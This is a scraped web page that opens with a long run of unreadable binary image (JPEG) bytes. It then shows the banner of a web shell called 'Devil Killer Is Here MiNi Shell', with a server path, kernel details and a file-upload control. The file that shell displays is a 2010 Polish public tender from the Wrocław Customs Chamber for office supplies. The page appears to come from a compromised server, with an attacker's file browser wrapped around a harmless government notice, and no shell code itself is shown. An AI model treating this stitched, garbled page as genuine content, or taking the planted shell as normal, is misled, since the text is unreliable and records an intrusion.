JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100706/196950-N-2010.html

<p class="kh_header"><b>Wrocław: Sprzedaż wraz z dostawą artykułów biurowych do Izby Celnej we Wrocławiu.</b><br>
<b>Numer ogłoszenia: 196950 - 2010; data zamieszczenia: 06.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna we Wrocławiu , ul. Hercena 11, 50-950 Wrocław, woj. dolnośląskie, tel. 071 3705328, faks 071 3435439.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.icwroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż wraz z dostawą artykułów biurowych do Izby Celnej we Wrocławiu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sprzedaż wraz z dostawą artykułów biurowych do Izby Celnej we Wrocławiu w następujących rodzajach i ilościach:
1.		Cienkopis czarny (o grubości końcówki min. 0,4 mm)	2500 szt
2.		Cienkopis czerwony (o grubości końcówki min. 0,4 mm)	
1500 szt.
3.		Cienkopis zielony (o grubości końcówki min. 0,4 mm)	
500 szt.
4.		Długopis z wkładem niebieskim  (z wymiennym wkładem, z końcówką o grubości min. 0,5 mm, przezroczysta obudowa  umożliwia kontrolę stopnia zużycia tuszu)	


1000 szt.
5.		Wkład do w/w długopisu (niebieski)	1500 szt.
6.		Wkład do w/w długopisu (czarny)	200 szt.
7.		Długopis w wkładem czerwonym (z wymiennym wkładem, z końcówką o grubości min. 0,5 mm)	
200 szt.
8.		Wkład do w/w długopisu (czerwony)	50 szt.
9.		Długopis żelowy z wkładem niebieskim, gładka i równa linia pisania, gumowy uchwyt, średnica końcówki min. 0,5 mm, z wymiennym wkładem	
2000 szt.
10.		Wkład żelowy do w/w długopisu  (niebieski)	3500 szt.
11.		Długopis z przylepcem ( na sprężynce) z wymiennym wkładem, podstawka przyklejana do podłoża, z możliwością regulacji nachylenia umieszczania długopisu, przezroczysta obudowa umożliwia kontrolę stanu zużycia	



5 szt.
12.		Deska z klipem A-4 - kieszeń na wewnętrznej stronie okładki oraz uchwyt na długopis	
30 szt.
13.		Dziurkacz mały (na 2 dziurki,z listwą formatową, wskaźnikiem środka, szerokość szczeliny 5 mm dziurkujący min. 25 kartek, z ogranicznikiem formatu, metalowy)	

90 szt.
14.		Dziurkacz duży typu Sax 608 (metalowy z ogranicznikiem formatu, na 2 dziurki, dziurkujący  min. 65 kartek	
25 szt.
15.		Dziurkacz duży- na 2 dziurki, ogranicznik formatu, pojemnik na ścinki, dziurkuje min. 150 kartek	
1 szt.
16.		Gumka recepturka -duża do akt (w op.min.100 szt., wytrzymałe i elastyczne wielokolorowe)	
50 szt.
17.		Gumka uniwersalna- do wymazywania ołówka, rozmiar min 41x21x11	500 szt.
18.		Igła - szewska, dł. min. 10cm, do zszywania akt	10 szt.
19.		Kalka ołówkowa  (100 szt. w op.)	50 szt.
20.		Kalka maszynowa  (100szt w op.)	50 szt.
21.		Kalkulator biurowy typu Citizen SDC888, 12 pozycyjny wyświetlacz, podwójna pamięć, zaokrąglanie wyników, cofanie ostatnio wprowadzonej pozycji, klawisz podwójnego zera, plastikowe klawisze,
podwójne zasilanie	



15 szt.
22.		Klej biurowy w sztyfcie (min. 36 g) - uniwersalny do klejenia papieru, fotografii, kartonu, nie marszczący  papieru, 	650 szt.
23.		Klej biurowy w płynie - (min. 50 ml) do precyzyjnego klejenia m.in. papieru, kartonu, itp., gąbczasta końcówka pozwalająca na równomierne nanoszenie kleju	

220 szt.
24.		Koperta C-3 (białe samoprzylepne z rozszerzonym bokiem) w op. 100 szt.	2 op.
25.		Koperta C-3 (brązowe) w op. 250 szt.	8 op.
26.		Koperta C-5 (białe samoprzylepna) w op.500 szt.	4 op.
27.		Koperta C-6 (białe samoprzylepna)w op.1000 szt.	40 op.
28.		Koperta B-4 (białe samoprzylepna)w op.250 szt.	10 op.
29.		Koperta C-6 z okienkiem  - okienko po prawej stronie, rozmiar okienka: szer. 9cm, wys.4,5cm, białe, samoprzylepna w op. 1000 szt.	
3 op.
30.		Koperta dmuchana na płytę CD -(C-5)	100 szt.
31.		Korektor w płynie min. 20 ml. z pędzelkiem, posiadający dobre właściwości kryjące, szybkoschnący	
350 szt.
32.		Kostka notes (biała, klejona o wym. min. 80x80 i 350 kartek)	1600 szt.
33.		Karteczki indeksujące samoprzylepne 4x50 karteczek   min. 20x50mm	300 szt.
34.		Teczka do podpisu (z 10 przegrodami), w oprawie introligatorskiej, grzbiet teczki harmonijkowy	
20 szt.
35.		Linijka 20 cm plastikowa	60 szt.
36.		Linijka 30 cm plastikowa	60 szt.
37.		Linijka 40 cm plastikowa	50 szt.
38.		Linijka 50 cm plastikowa	20 szt.
39.		Linijka 30 cm metalowa z uchwytem	1 szt.
40.		Marker czarny wodoodporny o szer. końcówki min. 2,5 mm	700 szt.
41.		Marker czerwony wodoodporny o szer. końcówki min. 2,5 mm	250 szt.
42.		Marker do opisywania płyt CD -grubość końcówki min 0,5 mm, wodoodporny, nieścieralny, powierzchnia plastikowa, metalowa, szklana, drewniana  - czarny	

50 szt.
43.		Naklejka na segregator A-4 - samoprzylepna	3000 szt.
44.		Notes samoprzylepny (o wym. min.75x75 i ilości kartek min. 100) 	2500 szt.
45.		Nożyczki - wielkość min. 21cm (wraz z ostrzem)	80 szt.
46.		Ofertówka (100szt.) A-4, przezroczysta, otwarta na górze, wzmocniony dziurkowany brzeg, folia polipropylenowa	
170 op. 
47.		Ołówek twardość H w oprawie drewnianej 	700 szt.
48.		Papier komputerowy 250x12 - 1 warstwowy	8 op.
49.		Papier komputerowy 390x12 - 1 warstwowy	8 op.
50.		Papier fax  210/30 	48 szt.
51.		Papier pakowy - (1 kg) min 120x100 cm	12 kg.
52.		Papier A-4  gramatura 80g/m2 , kolor pastelowy-słoneczny(op.500szt)
nadaje się do druku laserowego i kopiowania	
14 op.
53.		Plastelina (min 5 lasek w opakowaniu)	150 op.
54.		Płyn do czyszczenia komputera -(pianka),skutecznie usuwa kurz i zabrudzenia z  plastikowych powierzchni, nie powoduje zarysowań powierzchni poj. min 400 ml	

50 szt.
55.		Płyn do czyszczenia monitorów płaskich - szybki i skuteczny preparat przeznaczony do czyszczenia ekranów monitorów, poj. min 250 ml	60 szt.
56.		Płyta CD-R (op.10 szt.) - pojemność 80 min. lub 700MB	70 op.
57.		Płyta CD-R (op. 25 szt.)- pojemność 80 min. lub 700 MB	15 op.
58.		Płyta CD-RW (op. 10 szt.) - pojemność 80 min. lub 700 MB	20 op.
59.		Płyta DVD-R  (op. 5 szt.) - pojemność 700 MB	290 op.
60.		Płyta DVD-RW  (op. 5szt.) - wielokrotnego zapisu, pojemność 700 MB	140 op.
61.		Plomba plastikowa (zielona, czerwona)- samozaciskowa	700 szt.
62.		Poduszka twarda - do stempli okrągła średnica  min. 95mm.	20 szt.
63.		Poduszka miękka - do stempli min 110x70mm	20 szt.
64.		Pojemnik archiwizacyjny (formatu min. A-4, szerokość grzbietu min. 10 cm, na grzbiecie pole do umieszczania napisów, wykonany ze sztywnej tektury)	

3000 szt.
65.		Pojemnik archiwizacyjny (formatu min. A-4, szerokość grzbietu min. 12 cm, na grzbiecie pole do umieszczania napisów, wykonany ze sztywnej tektury)	
2000 szt.
66.		Pojemnik zbiorczy do archiwizacji - składany, mieści 5 pudełek archiwizacyjnych
Lub 6 segregatorów 7-centymetrowych,pola opisowe na bocznych ściankach, uchwyt ułatwiający przenoszenie pudeł, wymiary 520x340x305mm	



400 szt.
67.		Rozszywacz uniwersalny, nożycowy	200 szt.
68.		Segreg.A-4 wąski 50 mm (kolorowy, oklejony folią PP, z wymienną dwustronną etykietą do opisu, na grzbiecie otwór na palec, na dolnych krawędziach okucia metalowe, z mechanizmem oraz z dwoma otworami rado na przedniej okładce)	


1000 szt.
69.		Segregator A-4 70mm (kolorowy, oklejony folią PP, z wymienną dwustronną etykietą do opisu, na grzbiecie otwór na palec, na dolnych krawędziach okucia metalowe, z mechanizmem oraz z dwoma otworami rado na przedniej okładce)	


1000 szt.
70.		Skorowidz A-4 w twardej oprawie	10 szt.
71.		Skorowidz ? A-4 w twardej oprawie
	10 szt.
72.		Skoroszyt zawiesz. 1/1 -format A-4, biały, z wąsem metalowym, wyposażony w zawieszkę umożliwiającą wpięcie do segregatora, wykonany z kartonu
	

1000 szt.
73.		Skoroszyt. zawiesz. ? biały - format A-4, biały, z wąsem metalowym, wyposażony w zawieszkę umożliwiającą wpięcie do segregatora, wykonany z kartonu	

1000 szt.
74.		Skoroszyt plastikowy - A-4, przezroczysta przednia okładka, kolorowa tylna okładka, biały wyciągany pasek, z wąsami	
2500 szt.
75.		Skoroszyt plastikowy do wpinania do segregatora A-4, wykonany z PCV, sztywny	500 szt.
76.		Spinacz mały 28 mm ( 100 szt. w op.)-metalowy, okrągły	250 op.
77.		Spinacz krzyżowy, metalowy, wysokość min 40mm- (op. 50szt.)	70 op.
78.		Spinacz duży 50 mm ( 100 szt w op.) okrągły	200 op.
79.		Spinacz klips 19 mm (op. 12 szt.)	100 op.
80.		Spinacz klips 25 mm (op. 12 szt.)	50 op.
81.		Spinacz klips 32 mm  (op. 12 szt.)	50 op.
82.		Szuflada na dokumenty , wykonana z odpornego na pęknięcia polistyrenu, przeznaczona na dokumenty A-4, możliwość łączenia szufladek w pionie, wymiary mim. 60x250x335 mm, kolor- przydymione	

90 szt.
83.		Taśma bawełniana 6mm, dł. min. 50m w motku	200 szt.
84.		Taśma klejąca biurowa min. 18x30 ,wysokiej jakości, przezroczysta 	800 szt.
85.		Taśma pakowa  -jednostronnie klejąca, idealna do pakowania i uszczelniania kartonów, wymiary min 48mm x 46m	
500 szt.
86.		Taśma Dalton 5,7  (do kalkulatora)	20 szt.
87.		Taśma Dalton 6,9  (do kalkulatora)	20 szt.
88.		Teczka wiązana A-4 biała - kartonowa, wyposażona w tasiemki, posiada trzy wewnętrzne klapki zabezpieczające dokumenty przed wypadaniem	500 szt.
89.		Teczka A-4 z gumką lakierowana, wykonana z kartonu lakierowanego	200 szt.
90.		Teczka A-4 na rzepy twarda oprawa, pokryta ekologiczną folią	80 szt.
91.		Temperówka - stalowe ostrze mocowane wkrętem, przeznaczona do temperowania standardowych ołówków	200 szt.
92.		Tusz zielony- uniwersalny, w opakowaniu z tworzywa sztucznego, 
w buteleczkach min 22 ml 	150 szt.
93.		Wąsy do skoroszytów  (op.25szt.) z metalową blaszką	300 op.
94.		Worki papierowe min 50x10x110 - 3 warstwowe, szyte	600 szt.
95.		Woreczki strunowe min 150x200 (op. 10 szt.)	30 op.
96.		Woreczki strunowe min 200x250 (op. 10szt)	30 op.
97.		Zakreślacz fluorescencyjny ( o grubości zakreślania min 5mm)
Żółty
Zielony
pomarańczowy	

1000 szt.
500 szt.
500 szt.
98.		Zeszyt A-5  - 32 kart. kratka	60 szt.
99.		Zeszyt A-5 -(96 kartek zszyty) kratka, twarda oprawa	350 szt.
100.		Zeszyt A-4 (96 kartek, zszyty) kratka, twarda oprawa	300 szt.
101.		Zszywacz nożycowy zszywający min. 50 kartek do zszywek 24/8, wykonany całkowicie ze stali, chromowany	60 szt.
102.		Zszywacz  zszywający min. 15 kartek, o długość ramienia min.110mm, rozmiar zszywek 24/6, metalowe ramię metalowa podstawa	
150 szt.
103.		Zszywka 24/8 ( 1000 zszywek w op. )	500 op.
104.		Zszywka 24/6  (1000 zszywek w op.)	1000 op.
105.		Grzbiet do bindownicy 8 mm - plastikowe (op. 100)	2 op.
106.		Grzbiet do bindownicy 10 mm - plastikowe (op. 100)	1 op.
107.		Grzbiet do bindownicy 12 mm - plastikowe (op. 100)	2 op.
108.		Grzbiet do bindownicy 24 mm - plastikowe (op. 100)	2 op.
109.		Grzbiet do bindownicy 22 mm - plastikowe (op.100)	2 op.
110.		Okładka do bindownicy A-4, ciemna zieleń, sztywne tworzywo o ziarnistej fakturze (op.100)	3 op.
111.		Folia do bindownicy bezbarwna, przezroczysta, 0,20 mm (op.100)	4 op.
112.		Folia do laminatora  A-4 - antystatyczna, sztywna, krystalicznie przezroczysta, grubość 80, (op.100)	4 op.
113.		Folia do laminatora A-5 - antystatyczna, sztywna, krystalicznie przejrzysta, grubość 80, (op.100)	3 op.
114.		Papier ksero A-4 gramatura 80+/2g/m2, wilgotność 3.8-5,0%, grubości 103+/-um; białość 146+/-3; nieprzezroczystość  > 90%
	8690 ryz
115.		Papier ksero A-3 gramatura 80+/2g/m2, wilgotność 3.8-5,0%, grubości 103+/-um; białość 146+/-3; nieprzezroczystość  > 90%
	50 ryz
116.		Teczki zawieszane A-4 - ( do szaf aktowych szufladami)  wykonane z mocnego, wytrzymałego kartonu, przesuwny szyld wraz z etykietą opisową, wymienne, plastikowe identyfikatory, pojemność min. 100 kartek	150 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.72.00-8, 39.29.25.00-0, 30.19.20.00-1, 30.19.76.30-1, 30.19.76.44-2, 30.19.95.00-5, 30.19.92.00-2, 22.81.60.00-3, 24.91.00.00-6, 44.42.42.00-0, 39.24.12.00-5, 30.19.70.00-6, 30.19.28.00-9, 22.85.00.00-3, 30.23.43.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 2.500,00 zł.
Wadium może być wnoszone w następujących formach:
1.	pieniądzu,
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.	gwarancjach bankowych,
4.	gwarancjach ubezpieczeniowych,
5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
Wadium wnoszone w pieniądzu należy dokonać w formie przelewu na rachunek; 
NBP Oddział  Wrocław nr 12-101016740036651391200000
 z adnotacją : wadium - sprzedaż wraz z dostawą artykułów biurowych- nr sprawy: 450000-ILGW-253-29/10

Jeżeli wadium będzie wnoszone w innej formie niż w pieniądzu, Wykonawca jest zobowiązany oryginał wadium umieścić osobno w kopercie, jako załącznik do opakowania, w którym składa się ofertę, natomiast kserokopię dokumentu poświadczonego za zgodność z oryginałem załączyć do oferty. Wadium musi być ważne przez okres co najmniej 30 dni licząc od upływu terminu składania ofert (okres związania ofertą).

Informacje dodatkowe:
1)	Wadium musi być wniesione nie później niż przed upływem składania ofert. 
2)	Wadium będzie zwrócone (lub zatrzymane)  w terminie i na warunkach wskazanych w art. 46  ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających ten warunek Zamawiający uzna Wykonawców, którzy wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują co najmniej 2 dostawy materiałów biurowych  o wartości nie mniejszej niż 100.000,00 zł brutto (słownie: sto tysięcy złotych brutto) każda w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie oraz załączą dokumenty potwierdzające, że dostawy te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających ten warunek Zamawiający uzna Wykonawców, którzy przedstawią opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia na kwotę min. 100.000,00zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza zmianę postanowień niniejszej umowy, w przypadku: 
a)	wycofania z dystrybucji przedmiotu umowy, wymienionego w załączniku nr 1 do umowy i zastąpienia go produktem o parametrach nie gorszych niż oferowany, za cenę taką jak ustalona w niniejszej umowie,
b)	zmiany terminu dostawy z przyczyn niezależnych od Wykonawcy,
c)	ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.icwroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Izba Celna we Wrocławiu ul. Hercena 11 pok.204.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2010 godzina 10:00, miejsce: Izba Celna we Wrocławiu ul. Hercena 11 pok.5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





